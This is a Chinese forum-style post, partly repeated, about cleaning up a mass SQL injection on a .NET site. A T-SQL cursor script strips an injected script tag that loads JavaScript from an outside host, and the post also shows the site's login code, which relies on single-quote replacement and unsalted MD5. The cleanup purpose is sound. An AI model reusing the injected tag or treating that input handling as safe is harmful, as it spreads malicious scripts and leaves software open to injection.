用SQL语句删的方法 DECLARE @fieldtype sysname SET @fieldtype='varchar'--删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name) +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name=@fieldtype EXEC sp_MSforeach_Worker @command1=N'?'
<>这种都要编码放到数据库的.
情况:网站类型:.net2.0; 开发语言:C# 被篡改的两个表的修改更新入口在本地局域网发布,连接万网服务器登陆代码: sUserID = this.txt_UserId.Text.Replace("'", "_"); sUserPswd = System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(this.txt_UserPswd.Text, "md5"); if (sUserID.Equals("")) { this.lbl_UserIdInfo.Text = "请输入用户名!"; } else if (this.txt_UserPswd.Text.Trim().Equals("")) { this.lbl_UserPswdInfo.Text = "请输入密码!"; } else { //数据库登陆验证 int iChkST = new BOOGOO.BLL.Login().ChkLoginUserInfo(sUserID, sUserPswd);
如何防范参考:
http://topic.csdn.net/u/20080521/09/dad3eaba-bfc7-483c-98cd-d310f9a76ff0.html?seed=596201967
http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
开发语言:C#
被篡改的两个表的修改更新入口在本地局域网发布,连接万网服务器登陆代码:
sUserID = this.txt_UserId.Text.Replace("'", "_");
sUserPswd = System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(this.txt_UserPswd.Text, "md5");
if (sUserID.Equals(""))
{
this.lbl_UserIdInfo.Text = "请输入用户名!";
}
else if (this.txt_UserPswd.Text.Trim().Equals(""))
{
this.lbl_UserPswdInfo.Text = "请输入密码!";
}
else
{
//数据库登陆验证
int iChkST = new BOOGOO.BLL.Login().ChkLoginUserInfo(sUserID, sUserPswd);
在插入的时候应该要对内容进行判断,并难证是否可靠值。现在只能先把内容删了。
最近好多网站都被SQL注入了
至少要对输入的字符串进行HTML编码(HtmlEncode),从数据库提出进行HTML(HtmlDecode)解码